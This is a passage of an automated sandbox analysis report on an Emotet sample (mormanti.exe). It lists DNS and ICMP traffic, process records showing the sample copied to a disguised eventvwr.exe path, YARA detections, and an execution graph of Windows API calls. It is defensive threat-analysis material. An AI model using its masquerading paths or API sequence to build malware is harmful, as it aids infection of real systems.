                                                                                              Jul 16, 2021 17:06:07.841680050 CEST53559848.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:08.611358881 CEST6418553192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:08.670780897 CEST53641858.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:10.446573019 CEST6511053192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:10.504580975 CEST53651108.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:11.560636997 CEST5836153192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:11.613158941 CEST53583618.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:12.701705933 CEST6349253192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:12.751097918 CEST53634928.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:13.865761995 CEST6083153192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:13.920089960 CEST53608318.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:16.677190065 CEST6010053192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:16.726804018 CEST53601008.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:17.607249975 CEST5319553192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:17.669481039 CEST53531958.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:18.412681103 CEST5014153192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:18.466411114 CEST53501418.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:19.185880899 CEST5302353192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:19.238326073 CEST53530238.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:20.020277023 CEST4956353192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:20.072833061 CEST53495638.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:20.871370077 CEST5135253192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:20.925894976 CEST53513528.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:22.051337957 CEST5934953192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:22.109612942 CEST53593498.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:22.853486061 CEST5708453192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:22.902765989 CEST53570848.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:37.889744043 CEST5882353192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:37.957566977 CEST53588238.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:39.148256063 CEST5756853192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:39.210594893 CEST53575688.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:53.667342901 CEST5054053192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:53.735356092 CEST53505408.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:06:57.148108959 CEST5436653192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:06:57.205549002 CEST53543668.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:07:11.947230101 CEST5303453192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:07:12.015654087 CEST53530348.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:07:15.400922060 CEST5776253192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:07:15.462726116 CEST53577628.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:07:46.678647041 CEST5543553192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:07:46.753209114 CEST53554358.8.8.8192.168.2.3
                                                                                              Jul 16, 2021 17:07:51.150878906 CEST5071353192.168.2.38.8.8.8
                                                                                              Jul 16, 2021 17:07:51.219223976 CEST53507138.8.8.8192.168.2.3

                                                                                              ICMP Packets

                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                              Jul 16, 2021 17:07:12.259592056 CEST104.131.103.37192.168.2.38f70(Unknown)Destination Unreachable
                                                                                              Jul 16, 2021 17:07:15.256690979 CEST104.131.103.37192.168.2.38f70(Unknown)Destination Unreachable
                                                                                              Jul 16, 2021 17:07:21.273123980 CEST104.131.103.37192.168.2.38f70(Unknown)Destination Unreachable

                                                                                              Code Manipulations

                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Start time:17:06:08
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Users\user\Desktop\mormanti.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:'C:\Users\user\Desktop\mormanti.exe'
                                                                                              Imagebase:0xc10000
                                                                                              File size:102912 bytes
                                                                                              MD5 hash:6C94EDFEA6E5EE001B00122C9D01BD8A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.203541228.0000000002DC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.203533038.0000000002DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:17:06:09
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Windows\SysWOW64\msmpeg2vdec\eventvwr.exe
                                                                                              Imagebase:0xc10000
                                                                                              File size:102912 bytes
                                                                                              MD5 hash:6C94EDFEA6E5EE001B00122C9D01BD8A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.465228013.0000000001140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.465253689.0000000001151000.00000020.00000001.sdmp, Author: Joe Security
                                                                                              Reputation:low

                                                                                              General

                                                                                              Start time:17:06:15
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:35
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:37
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:45
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:46
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:47
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:47
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:47
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:48
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:49
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                              Imagebase:0x7ff641450000
                                                                                              File size:163336 bytes
                                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:06:49
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                              Imagebase:0x7ff7488e0000
                                                                                              File size:51288 bytes
                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high

                                                                                              General

                                                                                              Start time:17:07:50
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                              Imagebase:0x7ff6922b0000
                                                                                              File size:455656 bytes
                                                                                              MD5 hash:A267555174BFA53844371226F482B86B
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              General

                                                                                              Start time:17:07:50
                                                                                              Start date:16/07/2021
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff6b2800000
                                                                                              File size:625664 bytes
                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language

                                                                                              Disassembly

                                                                                              Code Analysis

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:8%
                                                                                                Dynamic/Decrypted Code Coverage:76.8%
                                                                                                Signature Coverage:4%
                                                                                                Total number of Nodes:1333
                                                                                                Total number of Limit Nodes:24

                                                                                                Graph

                                                                                                execution_graph 6870 2db50d9 6874 2db50f1 6870->6874 6872 2db5193 6886 2db21b0 6872->6886 6874->6872 6875 2db283f GetPEB 6874->6875 6876 2db5191 6874->6876 6878 2db1f3c 6874->6878 6881 2db289d 6874->6881 6875->6874 6895 2db28f5 6878->6895 6882 2db283f GetPEB 6881->6882 6883 2db28b1 6882->6883 6884 2db283f GetPEB 6883->6884 6885 2db28cc 6884->6885 6885->6874 6888 2db21c9 6886->6888 6887 2db2390 6889 2db283f GetPEB 6887->6889 6888->6887 6890 2db1f3c GetPEB 6888->6890 6891 2db283f GetPEB 6888->6891 6892 2db238e 6888->6892 6893 2db21b0 GetPEB 6888->6893 6894 2db289d GetPEB 6888->6894 6889->6892 6890->6888 6891->6888 6892->6876 6893->6888 6894->6888 6900 2db283f 6895->6900 6898 2db283f GetPEB 6899 2db1f72 6898->6899 6899->6874 6901 2db2853 6900->6901 6905 2db2861 6900->6905 6906 2db277c GetPEB 6901->6906 6903 2db2858 6908 2db26e7 6903->6908 6905->6898 6907 2db2791 6906->6907 6907->6903 6909 2db2748 6908->6909 6910 2db2725 6908->6910 6909->6905 6910->6909 6912 2db27b3 6910->6912 6913 2db27c8 6912->6913 6914 2db283f GetPEB 6913->6914 6915 2db27f6 6914->6915 6916 2db281a 6915->6916 6917 2db283f GetPEB 6915->6917 6918 2db26e7 GetPEB 6916->6918 6919 2db2839 6916->6919 6917->6916 6918->6919 6919->6909 6920 c12dc2 6921 c12dfe 6920->6921 6922 c12dd4 6920->6922 6922->6921 6923 c12df9 ?terminate@ 6922->6923 6923->6921 6924 2db50d8 6930 2db50db 6924->6930 6925 2db1f3c GetPEB 6925->6930 6926 2db5193 6927 2db21b0 GetPEB 6926->6927 6929 2db5191 6927->6929 6928 2db283f GetPEB 6928->6930 6930->6925 6930->6926 6930->6928 6930->6929 6931 2db289d GetPEB 6930->6931 6931->6930 7568 c12742 7569 c12750 7568->7569 7570 c12775 ?_type_info_dtor_internal_method@type_info@ 7568->7570 7572 c12770 7569->7572 7573 c12769 ??3@YAXPAX 7569->7573 7571 c12780 ??3@YAXPAX 7570->7571 7570->7572 7571->7572 7573->7572 7574 2db365f 7576 2db3672 7574->7576 7575 2db283f GetPEB 7575->7576 7576->7575 7577 2db36e7 7576->7577 7579 2db28f5 GetPEB 7576->7579 7580 2db36e5 7576->7580 7578 2db283f GetPEB 7577->7578 7578->7580 7579->7576 7581 c13347 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 6938 c11fcf ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 6939 c133ce 6944 c11be1 6939->6944 6941 c133d8 6942 c1283f 10 API calls 6941->6942 6943 c133e2 6942->6943 6950 c130b8 6944->6950 6946 c11bed ??2@YAPAXI 6947 c11bfc 6946->6947 6951 c11c81 ??2@YAPAXI 6947->6951 6949 c11c0d 6949->6941 6950->6946 6952 c11c8d 6951->6952 6952->6949 7594 2db124e 7595 2db1262 7594->7595 7596 2db1417 7595->7596 7597 2db28d1 GetPEB 7595->7597 7598 2db1415 7595->7598 7599 2db28f5 GetPEB 7595->7599 7601 2db283f GetPEB 7595->7601 7596->7598 7600 2db289d GetPEB 7596->7600 7597->7595 7599->7595 7600->7598 7601->7595 7602 2db404e 7603 2db283f GetPEB 7602->7603 7605 2db4068 7603->7605 7604 2db40d0 7605->7604 7606 2db28f5 GetPEB 7605->7606 7607 2db40af 7606->7607 7607->7604 7608 2db283f GetPEB 7607->7608 7608->7604 7609 2db304d GetPEB 6259 c1285b 6264 c1283f 6259->6264 6262 c128a0 6263 c12898 _amsg_exit 6263->6262 6267 c1279a 6264->6267 6266 c1284c __wgetmainargs 6266->6262 6266->6263 6274 c12d44 6267->6274 6269 c127a6 _decode_pointer 6270 c127c9 7 API calls 6269->6270 6271 c127bd _onexit 6269->6271 6275 c12836 _unlock 6270->6275 6272 c1282d __onexit 6271->6272 6272->6266 6274->6269 6275->6272 6953 c132da ??1exception@std@@UAE 7610 c12b60 7613 c12ff8 7610->7613 7612 c12b65 7612->7612 7614 c1302a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 7613->7614 7615 c1301d 7613->7615 7616 c13021 7614->7616 7615->7614 7615->7616 7616->7612 7617 2db717f 7621 2db7182 7617->7621 7618 2db71f8 7619 2db6d44 GetPEB 7619->7621 7620 2db69bb GetPEB 7620->7621 7621->7618 7621->7619 7621->7620 6965 c133e4 6966 c11c1e ??3@YAXPAX 6965->6966 6967 c133ef ??3@YAXPAX ??3@YAXPAX 6966->6967 7622 c11067 7627 c1103e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1exception@std@@UAE 7622->7627 6968 2db09f1 6971 2db0a03 6968->6971 6969 2db283f GetPEB 6969->6971 6970 2db0a78 6972 2db283f GetPEB 6970->6972 6971->6969 6971->6970 6973 2db0a76 6971->6973 6974 2db28f5 GetPEB 6971->6974 6972->6973 6974->6971 6975 c11fed 6976 c11f75 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 6975->6976 6979 c11d28 6976->6979 6978 c11f94 6986 c130b8 6979->6986 6981 c11d34 ?uncaught_exception@std@ 6982 c11d45 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6981->6982 6983 c11d4d 6981->6983 6982->6983 6984 c11d60 ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 6983->6984 6985 c11d68 6983->6985 6984->6985 6985->6978 6986->6981 6301 2dc4171 6306 2dc47c9 6301->6306 6303 2dc4176 6340 2dc2f00 6303->6340 6339 2dc47e5 6306->6339 6310 2dc4f4e 6417 2dc608a 6310->6417 6311 2dc4f4c 6311->6303 6317 2dc4f55 6531 2dc5c29 6317->6531 6329 2dc2f5e GetPEB 6329->6339 6332 2dc2f00 GetPEB 6332->6339 6339->6310 6339->6311 6339->6317 6339->6329 6339->6332 6346 2dc5f81 6339->6346 6354 2dc5db8 6339->6354 6363 2dc6d1e 6339->6363 6366 2dc5a8f 6339->6366 6372 2dc6696 6339->6372 6380 2dc67d8 6339->6380 6393 2dc6417 6339->6393 6401 2dc7787 6339->6401 6405 2dc58e2 6339->6405 6424 2dc5c0a 6339->6424 6427 2dc445f 6339->6427 6439 2dc3ad2 6339->6439 6443 2dc509f 6339->6443 6446 2dc5170 6339->6446 6451 2dc6c75 6339->6451 6458 2dc76b9 6339->6458 6464 2dc6146 6339->6464 6470 2dc2577 6339->6470 6473 2dc15fe 6339->6473 6481 2dc454f 6339->6481 6488 2dc117b 6339->6488 6505 2dc32db 6339->6505 6510 2dc7841 6339->6510 6517 2dc62ac 6339->6517 6525 2dc65bc 6339->6525 6341 2dc2f22 ExitProcess 6340->6341 6342 2dc2f14 6340->6342 6856 2dc2e3d GetPEB 6342->6856 6344 2dc2f19 6858 2dc2da8 6344->6858 6353 2dc5f99 6346->6353 6348 2dc2f00 GetPEB 6348->6353 6350 2dc6081 6350->6339 6353->6348 6353->6350 6544 2dc27b2 6353->6544 6557 2dc274c 6353->6557 6566 2dc25fd 6353->6566 6569 2dc2f5e 6353->6569 6361 2dc5dd3 6354->6361 6355 2dc2f00 GetPEB 6355->6361 6356 2dc5f74 6356->6339 6357 2dc25fd 2 API calls 6357->6361 6358 2dc5f62 6359 2dc2f00 GetPEB 6358->6359 6359->6356 6361->6355 6361->6356 6361->6357 6361->6358 6362 2dc2f5e GetPEB 6361->6362 6582 2dc388f 6361->6582 6362->6361 6364 2dc2f00 GetPEB 6363->6364 6365 2dc6d38 6364->6365 6365->6339 6369 2dc5aa5 6366->6369 6367 2dc5bc5 6367->6339 6368 2dc2f00 GetPEB 6368->6369 6369->6367 6369->6368 6370 2dc2f00 GetPEB 6369->6370 6371 2dc5b0c CreateFileW 6370->6371 6371->6367 6371->6369 6378 2dc66ae 6372->6378 6373 2dc67b7 6374 2dc27b2 GetPEB 6373->6374 6375 2dc67b5 6374->6375 6375->6339 6376 2dc25fd GetPEB RtlAllocateHeap 6376->6378 6377 2dc2f00 GetPEB 6377->6378 6378->6373 6378->6375 6378->6376 6378->6377 6379 2dc2f5e GetPEB 6378->6379 6379->6378 6381 2dc67f1 6380->6381 6382 2dc2f00 GetPEB 6381->6382 6383 2dc2fb6 2 API calls 6381->6383 6384 2dc2f00 GetPEB 6381->6384 6386 2dc69d2 6381->6386 6388 2dc6829 6381->6388 6596 2dc5667 6381->6596 6382->6381 6383->6381 6385 2dc68ce OpenSCManagerW 6384->6385 6385->6381 6386->6386 6389 2dc2f00 GetPEB 6388->6389 6390 2dc684c 6389->6390 6592 2dc23eb 6390->6592 6394 2dc642f 6393->6394 6395 2dc2f5e GetPEB 6394->6395 6396 2dc2f00 GetPEB 6394->6396 6398 2dc6481 6394->6398 6399 2dc646c 6394->6399 6617 2dc1000 6394->6617 6395->6394 6396->6394 6398->6339 6400 2dc2f00 GetPEB 6399->6400 6400->6398 6404 2dc779b 6401->6404 6402 2dc2fb6 2 API calls 6402->6404 6403 2dc77fb 6403->6339 6404->6402 6404->6403 6409 2dc58fd 6405->6409 6406 2dc25fd 2 API calls 6406->6409 6407 2dc2f00 GetPEB 6411 2dc59e5 SetFileInformationByHandle 6407->6411 6408 2dc5a71 6412 2dc2f00 GetPEB 6408->6412 6409->6406 6409->6407 6409->6408 6410 2dc2f00 GetPEB 6409->6410 6413 2dc5a6f 6409->6413 6414 2dc2f00 GetPEB 6409->6414 6415 2dc2f5e GetPEB 6409->6415 6410->6409 6411->6409 6412->6413 6413->6339 6416 2dc596b CreateFileW 6414->6416 6415->6409 6416->6409 6416->6413 6422 2dc60a2 6417->6422 6419 2dc25fd 2 API calls 6419->6422 6420 2dc6134 6420->6311 6421 2dc2f00 GetPEB 6421->6422 6422->6419 6422->6420 6422->6421 6423 2dc2f5e GetPEB 6422->6423 6624 2dc3564 6422->6624 6423->6422 6425 2dc2f00 GetPEB 6424->6425 6426 2dc5c25 6425->6426 6426->6339 6433 2dc447d 6427->6433 6428 2dc2f00 GetPEB 6428->6433 6429 2dc4504 6634 2dc26b1 6429->6634 6431 2dc4502 6431->6339 6432 2dc450e 6637 2dc3bcb 6432->6637 6433->6428 6433->6429 6433->6431 6436 2dc2f00 GetPEB 6437 2dc4532 6436->6437 6438 2dc2f5e GetPEB 6437->6438 6438->6431 6441 2dc3aef 6439->6441 6440 2dc3bba 6440->6339 6441->6440 6442 2dc2f00 GetPEB 6441->6442 6442->6441 6444 2dc2fb6 2 API calls 6443->6444 6445 2dc50a7 6444->6445 6445->6339 6448 2dc5182 6446->6448 6447 2dc52d5 6447->6339 6448->6447 6449 2dc2fb6 2 API calls 6448->6449 6450 2dc3855 GetPEB 6448->6450 6449->6448 6450->6448 6457 2dc6c8f 6451->6457 6452 2dc2fb6 2 API calls 6452->6457 6453 2dc6ce9 6454 2dc2f00 GetPEB 6453->6454 6455 2dc6ce7 6454->6455 6455->6339 6456 2dc2f00 GetPEB 6456->6457 6457->6452 6457->6453 6457->6455 6457->6456 6461 2dc76cb 6458->6461 6459 2dc7726 6459->6339 6460 2dc2f5e GetPEB 6460->6461 6461->6459 6461->6460 6463 2dc2f00 GetPEB 6461->6463 6642 2dc2ff4 6461->6642 6463->6461 6469 2dc615a 6464->6469 6465 2dc6289 6465->6339 6466 2dc628b 6468 2dc2f00 GetPEB 6466->6468 6467 2dc2f00 GetPEB 6467->6469 6468->6465 6469->6465 6469->6466 6469->6467 6471 2dc2fb6 2 API calls 6470->6471 6472 2dc25a8 6471->6472 6472->6339 6474 2dc2fb6 2 API calls 6473->6474 6476 2dc1609 6474->6476 6475 2dc164f 6475->6339 6476->6475 6645 2dc1d43 6476->6645 6479 2dc163f 6479->6339 6480 2dc2f5e GetPEB 6480->6475 6487 2dc4569 6481->6487 6482 2dc2f5e GetPEB 6482->6487 6483 2dc2fb6 2 API calls 6483->6487 6484 2dc4701 6484->6339 6486 2dc2f00 GetPEB 6486->6487 6487->6482 6487->6483 6487->6484 6487->6486 6652 2dc35fa 6487->6652 6503 2dc11a7 6488->6503 6490 2dc15ed 6491 2dc2f5e GetPEB 6490->6491 6492 2dc15eb 6491->6492 6492->6339 6496 2dc2f5e GetPEB 6496->6503 6497 2dc25fd GetPEB RtlAllocateHeap 6497->6503 6498 2dc2fb6 GetPEB RtlAllocateHeap 6498->6503 6502 2dc3715 GetPEB 6502->6503 6503->6490 6503->6492 6503->6496 6503->6497 6503->6498 6503->6502 6504 2dc2f00 GetPEB 6503->6504 6658 2dc1aec 6503->6658 6666 2dc20ee 6503->6666 6678 2dc1653 6503->6678 6694 2dc190f 6503->6694 6702 2dc412d 6503->6702 6707 2dc377d 6503->6707 6711 2dc1853 6503->6711 6504->6503 6506 2dc2f00 GetPEB 6505->6506 6507 2dc32fb 6506->6507 6508 2dc2f00 GetPEB 6507->6508 6509 2dc3310 6508->6509 6509->6339 6511 2dc7859 6510->6511 6512 2dc78b9 6511->6512 6744 2dc6def 6511->6744 6757 2dc707c 6511->6757 6766 2dc71c4 6511->6766 6778 2dc7405 6511->6778 6512->6339 6520 2dc62c7 6517->6520 6518 2dc62fa 6521 2dc2f00 GetPEB 6518->6521 6519 2dc2f00 GetPEB 6519->6520 6520->6518 6520->6519 6524 2dc6330 6520->6524 6522 2dc631e 6521->6522 6523 2dc2f00 GetPEB 6522->6523 6523->6524 6524->6339 6529 2dc65d5 6525->6529 6527 2dc6682 6527->6339 6528 2dc2f00 GetPEB 6528->6529 6529->6527 6529->6528 6838 2dc3268 6529->6838 6845 2dc331a 6529->6845 6541 2dc5c41 6531->6541 6532 2dc6146 GetPEB 6532->6541 6534 2dc5d6e 6534->6311 6535 2dc5d70 6536 2dc2f00 GetPEB 6535->6536 6537 2dc5d8b 6536->6537 6540 2dc2f00 GetPEB 6537->6540 6538 2dc25fd 2 API calls 6538->6541 6539 2dc2f00 GetPEB 6539->6541 6540->6534 6541->6532 6541->6534 6541->6535 6541->6538 6541->6539 6542 2dc2f5e GetPEB 6541->6542 6543 2dc27b2 GetPEB 6541->6543 6848 2dc5381 6541->6848 6542->6541 6543->6541 6574 2dc2f34 6544->6574 6547 2dc2f34 GetPEB 6548 2dc27dd 6547->6548 6549 2dc2f34 GetPEB 6548->6549 6550 2dc27e9 6549->6550 6551 2dc2f00 GetPEB 6550->6551 6552 2dc280c 6551->6552 6553 2dc2f00 GetPEB 6552->6553 6554 2dc2825 6553->6554 6555 2dc2f00 GetPEB 6554->6555 6556 2dc2862 6555->6556 6556->6353 6558 2dc25fd 2 API calls 6557->6558 6559 2dc2763 6558->6559 6560 2dc2f00 GetPEB 6559->6560 6561 2dc2784 6560->6561 6562 2dc2f5e GetPEB 6561->6562 6563 2dc2791 6562->6563 6564 2dc2f00 GetPEB 6563->6564 6565 2dc27a9 DeleteFileW 6564->6565 6565->6353 6577 2dc2fb6 6566->6577 6568 2dc2633 6568->6353 6568->6568 6570 2dc2f00 GetPEB 6569->6570 6571 2dc2f72 6570->6571 6572 2dc2f00 GetPEB 6571->6572 6573 2dc2f8d 6572->6573 6573->6353 6575 2dc2f00 GetPEB 6574->6575 6576 2dc27cc 6575->6576 6576->6547 6578 2dc2f00 GetPEB 6577->6578 6579 2dc2fca 6578->6579 6580 2dc2f00 GetPEB 6579->6580 6581 2dc2fe5 RtlAllocateHeap 6580->6581 6581->6568 6584 2dc38aa 6582->6584 6583 2dc2f5e GetPEB 6583->6584 6584->6583 6585 2dc2fb6 GetPEB RtlAllocateHeap 6584->6585 6586 2dc2f00 GetPEB 6584->6586 6587 2dc2f00 GetPEB 6584->6587 6589 2dc3ac4 6584->6589 6590 2dc3acb 6584->6590 6585->6584 6588 2dc3942 OpenServiceW 6586->6588 6587->6584 6588->6584 6591 2dc2f5e GetPEB 6589->6591 6590->6361 6591->6590 6593 2dc2400 6592->6593 6595 2dc2415 6593->6595 6602 2dc2871 6593->6602 6595->6339 6597 2dc5681 6596->6597 6598 2dc2f00 GetPEB 6597->6598 6599 2dc56b7 6597->6599 6600 2dc56da 6597->6600 6598->6597 6601 2dc2f00 